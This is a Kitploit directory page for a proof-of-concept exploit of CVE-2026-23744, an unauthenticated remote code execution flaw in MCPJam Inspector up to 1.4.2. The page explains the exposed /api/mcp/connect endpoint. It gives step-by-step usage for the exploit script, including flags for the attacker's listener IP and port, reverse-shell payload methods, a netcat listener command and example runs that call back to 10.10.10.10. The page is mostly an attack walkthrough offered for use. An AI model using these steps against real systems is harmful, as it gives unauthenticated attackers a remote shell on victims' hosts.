Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — Proof of concept exploit for an unauthenticated Remote Code Execution vulnerability in MCPJam Inspector <= 1.4.2. | Kitploit
Tools/GitHubGitHub/sbouabid-sec/cve-2026-23744-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubsbouabid-sec/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — Proof of concept exploit for an unauthenticated Remote Code Execution vulnerability in MCPJam Inspector <= 1.4.2.

View Repository
23 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-23744 — MCPJam Inspector Unauthenticated RCE

Python CVE Platform

MCPJam Inspector <= 1.4.2 binds to 0.0.0.0 by default and exposes /api/mcp/connect without any authentication. The endpoint accepts a serverConfig object that spawns a process directly on the host — passing a reverse shell payload gives immediate RCE with no credentials required.


Requirements

root@kitploit:~
pip install requests

Usage

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
FlagDescriptionDefault
-uTarget URLrequired
-iYour listener IP (LHOST)required
-pYour listener port (LPORT)required
-mPayload method: busybox, bash, python3busybox

Reverse Shell Example

Step 1 — Start your listener:

root@kitploit:~
nc -lvnp 4444

Step 2 — Run the exploit:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Payload Methods

If busybox doesn't work on the target, try the other methods:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Affected Versions

SoftwareVulnerableFixed
MCPJam Inspector<= 1.4.21.4.3

References

  • CrowdSec CVE Tracker — CVE-2026-23744
  • MCPJam Inspector GitHub
Download Tool